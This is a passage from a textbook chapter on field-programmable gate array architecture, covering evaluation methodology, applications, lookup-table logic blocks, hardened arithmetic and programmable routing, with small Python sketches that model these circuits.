QR decomposition using low complexity column-wise Givens rotation (CGR). In: 2014 27th
international conference on VLSI design, VLSID 2014, and 2014 13th international conference
on embedded systems, Mumbai, 5–9 Jan 2014. IEEE Computer Society, pp 258–263
Merchant F, Maity A, Mahadurkar M, Vatwani K, Munje I, Madhava Krishna C, Sivanandan
N, Gopalan N, Raha S, Nandy SK, Narayan R (2015) Micro-architectural enhancements in
distributed memory CGRAs for LU and QR factorizations. In: 28th International Conference
on VLSI Design, VLSID 2015, Bangalore, 3–7 Jan 2015. IEEE Computer Society, pp 153–158
Field-Programmable Gate Array Architecture
13
Andrew Boutros and Vaughn Betz

Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418
Methodology and Tools for FPGA Architecture Evaluation . . . . . . . . . . . . . . . . . . . . . . . . . . . 420
Key FPGA Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 422
Programmable Logic Blocks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423
Programmable Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
Programmable IO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435
Programmable Clock Distribution Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
On-chip Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439
DSP Blocks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 447
Processor Subsystems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 453
System-Level Interconnect: Network-on-Chip . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455
Interposers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 457
Configuration and Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460
Abstract
Since their inception more than thirty years ago, field-programmable gate arrays
(FPGAs) have grown more complex, more capable, and more diverse in their
applications. FPGAs can be reprogrammed at a fundamental level, changing
the function and interconnection of millions of elements. By reconfiguring
their hardware to match the application, FPGAs often achieve higher energy
efficiency, lower latency or faster time-to-market across a very wide range of
application domains. A modern FPGA combines many components, from logic
Keywords
Introduction
The idea of reconfigurable computing originated in the 1960s with the Fixed Plus
Variable Structure Computer (Estrin 1960), which aimed to enhance a conventional
computing system with the capability to temporarily morph into a more application-
specialized architecture. This would be achieved using additional programmable
logic and interconnect circuitry to implement operations beyond the capabilities of
the fixed datapath processor. A variety of research efforts subsequently investigated
ideas for reconfigurable computer architectures that could combine both software-
like flexibility and hardware efficiency. However, it was over 20 years later that the
first commercially successful reconfigurable computing device, known as a field-
programmable gate array (FPGA), was created by Xilinx in 1985.
As illustrated in Fig. 1, FPGAs consist of a two-dimensional array of pro-
grammable blocks (logic, IO, and others) that can be flexibly connected using a
network of pre-fabricated wires with programmable switches between them. The
functionality of all the FPGA blocks and the connectivity of the routing switches
are controlled using millions of configuration bits, usually stored in static
random access memory (SRAM) cells, which can be programmed to implement arbitrary digital
circuits. The designer describes the desired functionality in a hardware description
language (HDL) such as Verilog/VHDL or possibly uses high-level synthesis to
translate a higher-level programming language (e.g., C++ or OpenCL) to HDL. The
HDL design is then compiled using a complex computer-aided design (CAD) flow
into the bitstream file, analogous to a software program executable, which is used
to program all the FPGA’s configuration SRAM cells.
FPGAs combine aspects of general-purpose processors and application-specific
integrated circuits (ASICs). Their programmability allows a single FPGA to imple-
ment many different applications similar to a software-programmable processor,
while the fact that their hardware is reconfigurable enables custom systems similar
to an ASIC. However, FPGAs have a significantly lower non-recurring engineering
cost and shorter time-to-market since they do not require the physical design, layout,
fabrication, and verification stages that a custom ASIC would normally go through.
Fig. 1 Overview of a modern FPGA architecture, combining programmable logic with block RAMs, programmable IOs, a processor subsystem, and a PCIe controller
Methodology and Tools for FPGA Architecture Evaluation

Designing and evaluating an FPGA architecture involves decisions at many levels,
from the high-level organization (e.g., number and type of blocks, distribution of wire segment
lengths, size of logic clusters and logic elements), to micro-architectural details
(e.g., DSP and BRAM modes of operation, hard arithmetic in logic blocks, switch
block patterns), and down to transistor-level circuit implementation (e.g., pro-
grammable switch type, routing buffer transistor sizing, register implementation). It
also involves different implementation styles; the logic blocks and programmable
routing are designed and laid out as full-custom circuits, while most hardened
blocks (e.g., DSPs) mix standard-cell and full-custom design for the block core
and peripherals, respectively. Some blocks, such as BRAMs and high-speed IO,
even include significant analog circuitry. All these different components need to
be carefully modeled to evaluate the FPGA architecture in its entirety. Tools
such as COFFE (Yazdanshenas and Betz 2019) were developed to automate the
transistor-level design and modeling of FPGA blocks and programmable routing
components, speeding up FPGA architecture investigations. The area, timing, and
power models for each of these components are then typically combined in an
architecture description file, along with a specification of how these blocks and
routing components are organized into the overall architecture.
Finally, a re-targetable CAD system such as the Verilog-to-Routing (VTR) flow
(Murray et al. 2020a) is used to map the selected benchmarks to the described FPGA
architecture. Such a CAD system consists of a sequence of complex optimization
algorithms that synthesizes a benchmark written in an HDL into a circuit netlist,
maps it to the different FPGA blocks, places the mapped blocks at specific
locations on the FPGA, and routes the connections between them using the specified
programmable routing architecture. The implementation produced by the CAD
system is then used to evaluate several key metrics. Total area is the sum of the areas
of the FPGA blocks used by the application, along with the programmable routing
included with them. A timing analyzer finds the critical path(s) through the blocks
and routing to determine the maximum frequencies of the application’s clocks.
Power consumption is estimated based on resources used and signal toggle rates.
FPGAs are never designed for only one application, so these metrics are averaged
across all the benchmarks. Finally, the overall evaluation blends these average area,
delay, and power metrics appropriately depending on the architecture goal (e.g., high
performance or low power). Other metrics such as CAD tool runtime and routability
of the benchmarks on a candidate architecture are also often considered.
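As a minimal sketch of this last evaluation step, the Python fragment below averages per-benchmark results with a geometric mean and blends them into a single figure of merit; the benchmark numbers and exponent weights are invented for illustration and do not come from any particular tool.

    from math import prod

    def geomean(vals):
        return prod(vals) ** (1.0 / len(vals))

    # (area in mm^2, critical-path delay in ns, power in W) per benchmark -- illustrative
    results = [(12.0, 4.0, 3.5), (9.0, 5.5, 2.8), (21.0, 3.2, 5.0)]

    area = geomean([r[0] for r in results])
    delay = geomean([r[1] for r in results])
    power = geomean([r[2] for r in results])

    # Weight the averaged metrics according to the architecture goal,
    # e.g., emphasize delay for a high-performance target (lower score is better).
    w_area, w_delay, w_power = 1.0, 2.0, 0.5
    score = (area ** w_area) * (delay ** w_delay) * (power ** w_power)
    print(area, delay, power, score)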
As an example, a key set of questions in FPGA architecture is: What functionality
should be hardened (i.e., implemented as a new ASIC-style block) in the FPGA
architecture? How flexible should this block be? How much of the FPGA die area
should be dedicated to it? Ideally, an FPGA architect would like the hardened
functionality to be usable by as many applications as possible at the least possible
silicon cost. An application that can make use of the hard block will benefit by being
smaller, faster and more power-efficient than a soft implementation that uses only
the programmable logic and routing. This motivates having more programmability
in the hard block to capture more use cases; however, higher flexibility generally
comes at the cost of larger area and reduced efficiency of the hard block. On the
other hand, if a hard block is not usable by an application circuit, its silicon area is
wasted; the FPGA user would rather have more of the usable general-purpose logic
blocks in the area of the unused hard block. The impact of this new hard block on
the programmable routing must also be considered – does it need more interconnect
or lead to slow routing paths to and from the block? To evaluate whether a specific
functionality should be hardened or not, both the cost and gain of hardening it have
to be quantified empirically using the flow described in this section. FPGA architects
may try many ideas before landing on the right combination of design choices that
adds just the right amount of programmability to make this new hard block a net win.
In the rest of this chapter, we detail many different components of FPGAs and
key architecture questions for each. While we describe the key results without
detailing the experimental methodology used to find them, in general they came
from a holistic architecture evaluation flow similar to that in Fig. 2.
Key FPGA Applications

In this section, we present some of the key application domains of FPGAs and
highlight their advantages for use cases in these areas.
Wireless communication equipment (e.g., cell phone base stations) is a very large
market for FPGAs. The reconfigurability of FPGAs allows service providers to
implement a range of different standards and upgrade them in-field, while achieving
much higher energy efficiency compared to instruction-set-based DSP devices.
One of the key components in wireless communications is signal processing,
such as filtering. The direct hardware execution (without an instruction stream)
of FPGAs makes them very efficient for repetitive tasks of this nature. Table 1
compares the performance, power and energy efficiency of a Stratix IV FPGA to
two Texas Instruments DSP devices (scaled optimistically to the same 40 nm process
technology of the FPGA) when implementing simple signal filtering using a 51-tap
finite impulse response (FIR) filter. The results show that even a single instance of
the FIR filter (consuming only 2% of the FPGA resources) can achieve two orders of
magnitude higher performance compared to both DSPs, and 7.7× and 63.2× higher
energy efficiency compared to the C5505 and C674x, respectively. The FPGA can
achieve another order of magnitude higher performance by instantiating up to 49
instances of the FIR filter working in parallel at the cost of only 9× higher power
consumption since the FPGA static power (80% of the FPGA power in Table 1)
remains the same regardless of the amount of utilized resources.
Table 1 Performance, power, and energy efficiency comparison between a Stratix IV FPGA and
two DSP devices. The results of the DSPs are optimistically scaled to the FPGA’s 40 nm process
technology
Device Performance (samples/s) Power (mW) Energy efficiency (samples/s per W)
TI C5505 1.77 × 10^6 28 6.32 × 10^7
TI C674x 3.21 × 10^6 416 7.72 × 10^6
Stratix IV GX230 5.1 × 10^8 1046 4.88 × 10^8
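The ratios quoted in the text follow directly from Table 1; the short Python check below reproduces them, computing energy efficiency as performance divided by power.

    # Figures taken from Table 1.
    perf = {"C5505": 1.77e6, "C674x": 3.21e6, "StratixIV": 5.1e8}   # samples/s
    power_w = {"C5505": 0.028, "C674x": 0.416, "StratixIV": 1.046}  # watts

    eff = {k: perf[k] / power_w[k] for k in perf}                   # samples/s per W
    print(perf["StratixIV"] / perf["C5505"])  # ~288x: two orders of magnitude faster
    print(eff["StratixIV"] / eff["C5505"])    # ~7.7x higher energy efficiency
    print(eff["StratixIV"] / eff["C674x"])    # ~63.2x higher energy efficiency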
Wired communications and networking are also heavy users of FPGAs. The
richness and diversity of FPGA IOs are important in this use case, as many
different and very high-speed IO standards are used in chip-to-chip, server-to-
server and city-to-city communications. FPGAs are often used in high-end packet
processing and switching systems, which have a high degree of parallelism and a
need for high throughput and low latency (Zhao et al. 2020). This is well-suited to
an FPGA’s spatial architecture and the ability to customize processing pipelines
to the bare minimum required by the target application to reduce latency compared
to general-purpose processors with a fixed pipeline and memory hierarchy. The
hardened network transceivers in modern FPGAs along with the ability to
customize the network stack implementation also make FPGAs suitable for ultra-
low latency networking interfaces. This can also be useful in other domains,
including financial applications such as high-frequency trading (Lockwood et al.
2012) where FPGA reprogrammability allows integration of the rapidly changing
trading algorithms on the same chip as the low-latency networking interface.
More recently, FPGAs have also been deployed on a large scale in datacenters
where both their computation and networking capabilities are leveraged. The
Microsoft Catapult project couples every CPU server with an FPGA that can be
used to accelerate search engines, packet processing, encryption and compression
(Putnam et al. 2014; Caulfield et al. 2016). This achieved a 95% improvement in
the ranking throughput of their search engine infrastructure at the cost of only
10% higher power consumption. The network-connected FPGAs in the Catapult
project were also used to implement Brainwave, a datacenter-scale deep learning
accelerator for real-time low-latency inference (Fowers et al. 2018).
The hardware reprogrammability of FPGAs has led to their extensive use in
ASIC prototyping (Krupnova and Saucier 2000), where either a part or the entirety
of an ASIC design is emulated on FPGAs to verify functionality or estimate
performance before fabrication. There are a myriad of other application domains
for FPGAs including embedded real-time video processing in autonomous vehicles
(Rettkowski et al. 2017), genomics (Turakhia et al. 2018), biophotonic simulations
(Young-Schultz et al. 2020), accelerated RTL simulation (Karandikar et al. 2018),
and many more.
These diverse applications are enabled by the various components of an FPGA
architecture working together, and in the following sections we detail the architec-
ture of each of these components.
Programmable Logic Blocks

The earliest reconfigurable devices, programmable array logic (PAL) devices,
consisted of an array of AND gates feeding OR gates, with programmable switches
that could be flexibly configured to select the inputs to each of the AND/OR
gates to implement
different Boolean expressions. The design tools for PALs were very simple since the
delay through the device is constant regardless of the logic function implemented.
However, PALs did not scale well; as device logic capacity increased, the wires
connecting the AND/OR grid became increasingly longer and slower and the number
of required programmable switches grew quadratically.
Subsequently, complex programmable logic devices (CPLDs) kept the AND/OR
arrays as the basic logic elements, but attempted to solve the scalability challenge
by integrating multiple PALs on the same die with a crossbar interconnect between
them at the cost of more complicated design tools. Shortly after, Xilinx pioneered
the first FPGA in 1985, which consisted of an array of SRAM-based lookup tables
(LUTs) with programmable interconnect between them. This style of reconfigurable
devices was shown to scale very well, with LUTs achieving much higher area
efficiency compared to the AND/OR logic in PALs and CPLDs. Consequently,
LUT-based architectures became increasingly dominant and today LUTs form the
fundamental logic element in all commercial FPGAs. Some research attempts
investigated replacing LUTs with a different form of configurable AND gates: a full
binary tree of AND gates with programmable output/input inversion known as an
AND-inverter cone (AIC) (Parandeh-Afshar et al. 2012). However, when thoroughly
evaluated in Zgheib et al. (2014), AIC-based FPGA architectures had significantly
larger area than LUT-based ones, with delay gains only on small benchmarks that
have relatively short and localized critical paths.
A K-LUT can implement any K-input Boolean function by storing its truth
table in 2^K configuration SRAM cells. Figure 4a shows the transistor-level circuit
implementation of a 4-LUT using pass-transistor logic. The four inputs (A, B, C,
and D) are used as multiplexer select lines to choose an output from the 16 values
of the truth table in the SRAMs. In addition to the output buffer, an internal
buffering stage (shown between the second and third stages of the LUT in Fig. 4a)
is typically implemented to mitigate the quadratic increase in delay when passing
through a chain of pass-transistors. The sizing of the LUT’s pass-transistors and
the internal/output buffers is carefully tuned to achieve the best area-delay product.

Fig. 4 (a) Transistor-level implementation of a 4-LUT using pass-transistor logic with internal buffering, and (b) a basic logic element (BLE) comprising a K-LUT with an optional output register, a feedback output (Ofeedback), and a routing output (Orouting)
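Functionally, a K-LUT is simply a 2^K-entry truth table addressed by its inputs. The following Python sketch (our own illustration; the pass-transistor multiplexer tree and buffers of Fig. 4a are abstracted away) models this behavior:

    def lut_eval(truth_table, inputs):
        # 'truth_table' models the 2^K configuration SRAM cells (list of 0/1);
        # the K inputs act as multiplexer select lines choosing one cell.
        index = 0
        for bit in inputs:  # MSB-first
            index = (index << 1) | bit
        return truth_table[index]

    # Configure a 4-LUT as a 4-input XOR: cell i holds the parity of i.
    xor4 = [bin(i).count("1") & 1 for i in range(16)]
    print(lut_eval(xor4, [1, 0, 1, 1]))  # 1 (three inputs high -> odd parity)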
Classic FPGA literature (Betz et al. 1999) defines the basic logic element (BLE)
as a K-LUT coupled with an output register and 2:1 bypassing multiplexers as
shown in Fig. 4b. Thus, a BLE can be used to implement just a flip-flop (FF)
with the LUT configured as an identity function, or any Boolean expression with
up to K inputs and optionally-registered output. As illustrated in Fig. 5a, BLEs
are typically clustered in logic blocks (LBs), such that an LB contains N BLEs
along with local interconnect. The local interconnect in the logic block consists
of multiplexers between signal sources (BLE outputs and logic block inputs) and
destinations (BLE inputs). These multiplexers are often arranged to form a local
full (Betz and Rose 1998) or partial (Lemieux et al. 2000) crossbar. At the circuit
level, these multiplexers are usually built as two levels of pass transistors, followed
by a two-stage buffer as shown in Fig. 5b; this is the most efficient circuit design
for FPGA multiplexers in most cases (Chiasson and Betz 2013a). Figure 5a also
shows the switch and connection block multiplexers forming the programmable
routing used for inter-LB communication; this routing is discussed in detail in
the “Programmable Routing” section.
Fig. 5 (a) A logic block (LB) containing N BLEs with local interconnect, connected to the vertical and horizontal routing through connection block multiplexers, and (b) circuit implementation of an FPGA routing multiplexer as two levels of pass transistors followed by a two-stage output buffer
Over the years, the sizes of LUTs (K) and LBs (N) have gradually increased
with growing device logic capacity. As K increases, more functionality can be
captured into a single LUT. Therefore, the same circuit can be implemented using
fewer LUTs with a smaller number of logic levels on the critical path, which
increases performance. In addition, the demand for inter-LB routing decreases as
more connections are captured into the fast local interconnect by increasing N. On
the other hand, the area of the LUT increases exponentially with K (due to the 2^K
SRAM cells) and its speed degrades linearly (due to propagation through a chain
of K pass transistors with periodic buffering). The size of the local crossbar also
increases quadratically and its speed degrades linearly with increasing N. Ahmed
and Rose (2004) empirically evaluated these trade-offs and found that LUTs of size
4–6 and LBs of size 3–10 BLEs offer the best area-delay product for an FPGA
architecture, with 4-LUTs leading to a better area but 6-LUTs yielding a higher
speed. Historically, the first Xilinx FPGAs had an LB with only two 3-LUTs (i.e.,
N = 2, K = 3). LB size gradually increased over time and by 1999, Xilinx’s Virtex
family had four 4-LUTs and Altera’s Apex 20K family had ten 4-LUTs in each LB.
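The growth rates described above can be summarized in a toy model; the constants below are arbitrary, and only the trends (exponential LUT area in K, roughly linear delay in K) follow the text.

    def lut_area(K):
        return 2 ** K        # dominated by the 2^K SRAM cells

    def lut_delay(K):
        return K             # chain of K pass-transistor stages (with buffering)

    for K in (3, 4, 5, 6, 7):
        print(K, lut_area(K), lut_delay(K), lut_area(K) * lut_delay(K))
    # The area-delay product grows quickly beyond K = 6, consistent with the
    # empirical sweet spot of 4- to 6-input LUTs found by Ahmed and Rose (2004).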
The next major logic feature was the fracturable LUTs introduced in 2003 by
Altera in their Stratix II architecture. Ahmed and Rose in (2004) showed that
an LB with ten 6-LUTs achieved 14% better performance but increased area by
17% compared to an LB with ten 4-LUTs. In addition, an architecture with only
6-LUTs can suffer from significant under-utilization. Lewis et al. found that 64%
of the LUTs implemented for a commercial benchmark suite used fewer than
6 inputs, wasting some of the 6-LUT functionality (Lewis et al. 2005). Based on
these observations, fracturable LUTs were introduced to combine the best of both
worlds: the higher performance of larger LUTs and the superior area-efficiency of
smaller ones. A fracturable {K, M}-LUT can be configured as a single LUT of size
K or can be fractured into two LUTs of size up to K − 1 that collectively use no more
than K + M distinct inputs. Figure 6a shows that a 6-LUT is internally composed
of two 5-LUTs plus a 2:1 multiplexer. Consequently, almost no extra circuitry (only
the added output, shown in red) is necessary to allow a 6-LUT to instead operate as two 5-LUTs
that share the same inputs. However, this requires the two 5-LUTs to share all their
inputs which limits how often both LUTs can be simultaneously used. Adding extra
routing ports as shown in Fig. 6b relaxes this constraint and makes it easier to find
two logic functions that can be packed together into a fracturable 6-LUT at the cost
of slightly increasing its area. The adaptive logic module (ALM) in the Stratix II
architecture implemented a {6, 2}-LUT that had 8 input and 2 output ports. Thus, an
ALM can implement a 6-LUT or two 5-LUTs sharing 2 inputs (and therefore a total
of 8 distinct inputs). Pairs of smaller LUTs could also be implemented without any
shared inputs, such as two 4-LUTs or one 5-LUT and one 3-LUT. With a fracturable
6-LUT, larger logic functions are implemented in 6-LUTs reducing the logic levels
on the critical path and achieving better performance. On the other hand, pairs of
smaller logic functions can be packed together (each using only half an ALM),
improving area-efficiency. The LB in Stratix II not only increased the performance
by 15%, but also reduced the logic and routing area by 2.6% compared to a baseline
4-LUT-based LB (Lewis et al. 2005).
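The packing rule for a fracturable {K, M}-LUT can be stated in a few lines of Python. This is a sketch of the legality check only; real packers also weigh timing and routability, and the function name is ours.

    def can_pack(inputs_a, inputs_b, K=6, M=2):
        # Each function must fit in a (K-1)-LUT, and together the pair may use
        # at most K + M distinct inputs (Stratix II ALM: K = 6, M = 2).
        if len(inputs_a) > K - 1 or len(inputs_b) > K - 1:
            return False
        return len(set(inputs_a) | set(inputs_b)) <= K + M

    print(can_pack({"a","b","c","d","e"}, {"d","e","f","g","h"}))  # True: 8 distinct inputs, 2 shared
    print(can_pack({"a","b","c","d","e"}, {"f","g","h","i","j"}))  # False: 10 distinct inputs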
Xilinx later adopted a similar approach in their Virtex-5 architecture in which
the 6-LUTs can also be decomposed into two 5-LUTs. However, they adopted a
LUT architecture similar to that shown in Fig. 6a with minimal changes compared
to the traditional 6-LUT (i.e., no extra input routing ports or steering multiplexers).
Fig. 6 6-LUT fracturable into two 5-LUTs with (a) no additional input ports, leading to 5 shared
inputs or (b) two additional input ports and steering multiplexers, leading to only 2 shared inputs
This results in a lower area per fracturable LUT, but makes it more difficult to pack
two smaller LUTs together as they must use no more than 5 distinct inputs. While
subsequent architectures from both Altera/Intel and Xilinx have also been based
on fracturable 6-LUTs, recent work from Microsemi (Feng et al. 2018) revisited
the 4-LUT vs. 6-LUT efficiency trade-off for newer process technologies, CAD
tools and designs than those used in Ahmed and Rose (2004). It shows that a
LUT structure with two tightly coupled 4-LUTs, one feeding the other, can achieve
performance close to conventional 6-LUTs while maintaining the high utilization
and area efficiency of 4-LUTs. In terms of LB size, FPGA architectures from
Altera/Intel and Xilinx converged on the use of relatively large LBs with ten and
eight BLEs respectively, for several generations. However, the Versal architecture
from Xilinx further increases the number of BLEs per LB to thirty-two (Gaide
et al. 2019). This significant increase in LB size is motivated by two main factors.
First, inter-LB wire delay is scaling poorly with process shrinks, so capturing more
connections within an LB’s local routing is increasingly beneficial. Second, ever-
larger FPGA designs tend to increase CAD tool runtime, but larger LBs can mitigate
this trend by simplifying placement and inter-LB routing.
The number of FFs per BLE and the circuit-level FF implementation are other
important architecture choices. Early FPGAs with non-fracturable LUTs had a
single FF to optionally register the LUT output as shown in Fig. 4b. When they
moved to fracturable LUTs, both Altera/Intel and Xilinx architectures added a
second FF to each BLE so that both outputs of the fractured LUT could be
registered, as shown in Fig. 6a and b. In the Stratix V architecture, the number of
FFs was doubled (i.e., four FFs per BLE) to accommodate the increasing demand
for FFs as designs became more deeply pipelined to achieve higher performance
(Lewis et al. 2013). Low-cost multiplexing circuitry allows sharing the existing
inputs between the LUTs and FFs to avoid adding more costly routing ports. Stratix
V also implements FFs as pulse latches instead of edge-triggered FFs. As shown
in Fig. 7b, this removes one of the two latches that would be present in a master-
slave FF (Fig. 7a), reducing the register delay and area. A pulse latch acts as a
cheaper FF with worse hold time as it latches the data input during a very short
pulse instead of a clock edge as in conventional FFs. However, it would be area-
inefficient to build a pulse generator for each latch. Instead, this cost is amortized
by implementing only two configurable pulse generators per LB; each of the
40 pulse latches in an LB selects which generator provides its pulse input. The
FPGA CAD tools can also program the pulse width in these generators, allowing a
limited amount of time borrowing between source and destination registers. Soon
after, the Xilinx Ultrascale+ architecture also adopted the use of pulse latches as its
FFs due to their area and speed benefits (Ganusov and Devlin 2016).

Fig. 7 Circuitry for (a) master-slave positive-edge-triggered FF, and (b) pulse latch
Murray et al. found that 22% of logic elements in the Titan suite of benchmarks
implemented addition or subtraction (Murray et al. 2020b). When implemented with
LUTs, each bit of arithmetic in a ripple carry adder requires two LUTs, one for
generating the sum and another for the carry. This is inefficient as it results in high
logic utilization and a slow critical path due to having many cascaded LUTs in
series for computing the carries in multi-bit additions. Consequently, all modern
FPGA architectures include hardened arithmetic circuitry in their LBs. There are
many variants, but all have several common points. First, to avoid adding expensive
routing ports, the arithmetic circuits re-use the LUT routing ports or are fed by
the LUT outputs. Second, the carry bits are propagated on a special, dedicated
interconnect with little or no programmability so that the crucial carry path is fast.
The lowest cost arithmetic circuitry hardens ripple carry structures and achieves
a large speed gain over LUTs (3.4× for a 32-bit adder in Murray et al. 2020b).
Hardening more sophisticated structures like carry skip adders further improves
speed (an additional 20% speed-up at 32 bits in Yazdanshenas and Betz 2019).
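To see why hardening helps, consider what a purely soft ripple-carry adder looks like: each bit position needs two Boolean functions (sum and carry-out), i.e., two LUTs, with the carry rippling through general routing. A behavioral Python sketch (our own illustration of the logic being hardened):

    def full_adder(a, b, cin):
        s = a ^ b ^ cin                     # the "sum" LUT
        cout = (a & b) | (cin & (a ^ b))    # the "carry" LUT
        return s, cout

    def ripple_add(a_bits, b_bits):         # LSB-first lists of 0/1
        carry, out = 0, []
        for a, b in zip(a_bits, b_bits):
            s, carry = full_adder(a, b, carry)
            out.append(s)
        return out, carry                   # a 32-bit add -> 64 LUTs, 32-deep carry path

    print(ripple_add([1, 1, 0, 1], [1, 0, 1, 0]))  # 11 + 5 = 16 -> ([0, 0, 0, 0], carry 1)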
The latest Versal architecture from Xilinx (Gaide et al. 2019) hardens the carry
logic for 8-bit carry look-ahead adders (i.e., the addition can only start on every
eighth BLE), while the sum, propagate and generate logic is all implemented in the
fracturable 6-LUTs feeding the carry logic as shown in Fig. 8a. This organization
allows implementing 1 bit of arithmetic per logic element. On the other hand,
the latest Intel Agilex architecture can implement two bits of arithmetic per logic
element, with a dedicated interconnect for the carry as shown in Fig. 8b. It achieves
that by hardening 2-bit carry-skip adders that are fed by the four 4-LUTs contained
within a fracturable 6-LUT (Chromczak et al. 2020). The study by Murray et al.
(2020b) shows that the combination of fracturable LUTs and 2 bits of arithmetic
(similar to that adopted in Altera/Intel FPGAs) is particularly efficient compared to
architectures with non-fracturable LUTs or 1 bit of arithmetic per logic element.
It also concludes that having dedicated arithmetic circuits (i.e., hardening adders
and carry chains) inside the FPGA logic elements increases average performance
by 75% and 15% for arithmetic microbenchmarks and general benchmark circuits,
respectively.

Fig. 8 Overview of the hard arithmetic circuitry (in red) in the logic elements of (a) Xilinx and (b) Altera/Intel FPGAs. A[i] and B[i] are the ith bits of the two addition operands A and B. The Xilinx logic elements compute carry propagate (prop) and generate (gen) in the LUTs, while the Altera/Intel ones use LUTs to pass inputs to the hard adders. Unlabeled inputs are unused when implementing adders
Recently, deep learning (DL) has become a key workload in many end-user
applications, with its core operation being multiply-accumulate (MAC). Generally,
MACs can be implemented in DSP blocks as will be described in the “DSP Blocks”
section; however, low-precision MACs with 8-bit or narrower operands (which
are becoming increasingly popular in DL workloads) can also be implemented
efficiently in the programmable logic (Caulfield et al. 2016). In this case, LUTs
implement AND gates to generate partial products followed by an adder tree to
reduce the partial products and perform the accumulation. Consequently, multiple
recent studies (Rasoulinezhad et al. 2020; Eldafrawy et al. 2020) have investigated
increasing the density of hardened adders in the FPGA’s logic fabric to enhance
its performance when implementing arithmetic-heavy applications such as DL. The
work in Eldafrawy et al. (2020) proposed multiple different logic block architectures
that incorporate 4 bits of arithmetic per logic element arranged in one or two
carry chains with different configurations, instead of just 2 bits of arithmetic in
an Intel Stratix-like ALM. These proposals do not require increasing the number
of the (relatively expensive) routing ports in the logic clusters when implementing
multiplications due to the high degree of input sharing in a multiplier array (i.e.,
for an N-bit multiplier, only 2N inputs are needed to generate N^2 partial products).
The most promising of these proposals increases the density of MAC operations by
1.7× while simultaneously improving their speed. It also reduces the required logic
and routing area by 8% for general benchmarks, highlighting that more arithmetic
density is beneficial for applications beyond DL.
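The input-sharing argument can be made concrete: for an N-bit multiplier, the 2N operand bits fan out to N^2 AND gates (LUTs) whose outputs feed the adder tree. A small Python sketch (function name is ours):

    def partial_products(a_bits, b_bits):   # LSB-first lists of 0/1
        # Each of the N^2 partial-product bits is a 2-input AND, generated
        # from only 2N distinct operand bits -- hence the high input sharing.
        return [[a & b for b in b_bits] for a in a_bits]

    pp = partial_products([1, 0, 1, 1], [1, 1, 0, 1])
    print(len(pp) * len(pp[0]))  # 16 partial products from only 8 operand bits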
Programmable Routing
Programmable routing commonly accounts for 50% or more of the fabric area and
the critical path delay of applications (Chiasson and Betz 2013b), so its efficiency
is crucial. Programmable routing is composed of pre-fabricated wire segments
connected via programmable switches. By programming an appropriate sequence
of switches to be on, a connection can be formed between any two function
blocks. There are two main classes of FPGA routing architecture. Hierarchical
FPGAs are inspired by the fact that designs are inherently hierarchical; higher-
level modules instantiate lower-level modules and connect signals between them,
with communication being more frequent between modules that are near each other
in the design hierarchy. As shown in Fig. 9, hierarchical FPGAs can realize these
connections with short wires that connect small regions of the chip. To communicate
to more distant regions, a connection (highlighted in red) passes through multiple
wires and switches as it traverses different levels of the interconnect hierarchy.
This style of architecture was popular in many earlier FPGAs, such as Altera’s
Flex and Apex families, but it leads to very long wires at the upper levels of the
interconnect hierarchy which became problematic as process scaling made such
wires increasingly resistive. A strictly hierarchical routing architecture also results
in some blocks that are physically close together (e.g., the blue blocks in Fig. 9)
which still require several wires and switches to connect. Consequently, this routing
architecture is primarily used today for smaller FPGAs, such as the FlexLogix
FPGA IP cores that can be embedded in larger SoC designs.

Fig. 9 A hierarchical routing architecture connecting logic blocks (LBs) through multiple levels of switch boxes
The other type of FPGA interconnect is island-style, as depicted in Fig. 10.
This architecture was pioneered by Xilinx and is inspired by the fact that a
regular two-dimensional layout of horizontal and vertical directed wire segments
can be efficiently laid out. As shown in Fig. 10, island-style routing includes three
components: routing wire segments, connection blocks (multiplexers) that connect
function block inputs to the routing wires, and switch blocks (programmable
switches) that connect routing wires together to realize longer routes. The placement
engine in FPGA CAD tools chooses which function block implements each
element of a design in order to minimize the required wiring. Consequently, most
connections between function blocks span a small distance and can be implemented
with a few routing wires as illustrated by the red connection in Fig. 10.
Fig. 10 Island-style routing architecture. Thick solid lines are routing wires while dashed lines
are programmable switches. Connection and switch blocks are shaded in yellow and green,
respectively
Early island-style architectures made every routing wire span only a single logic
block, but research showed that this resulted in more programmable switches than
necessary, and that making all wiring
segments span four logic blocks before terminating reduced application delay by
40% and routing area by 25% (Betz and Rose 1999). Modern architectures include
multiple lengths of wiring segments to better match the needs of short and long
connections, but the most plentiful wire segments remain of moderate length, with
four logic blocks being a popular choice. Longer distance connections can achieve
lower delay using longer wire segments, but in recent process nodes wires that span
many (e.g., 16) logic blocks must use wide and thick metal traces on upper metal
layers to achieve acceptable resistance (Petelin and Betz 2016). The amount of such
long-distance wiring one can include in a metal stack is limited. To best leverage
such scarce wiring, Intel’s Stratix FPGAs allow long wire segments to be connected
only to short wire segments, rather than function block inputs or outputs (Lewis
et al. 2003). This creates a form of routing hierarchy within an island-style FPGA,
where short connections use only the shorter wires, but longer connections pass
through short wires to reach the long wire network. Another area where hierarchical
FPGA concepts are used within island-style FPGAs is within the logic blocks. As
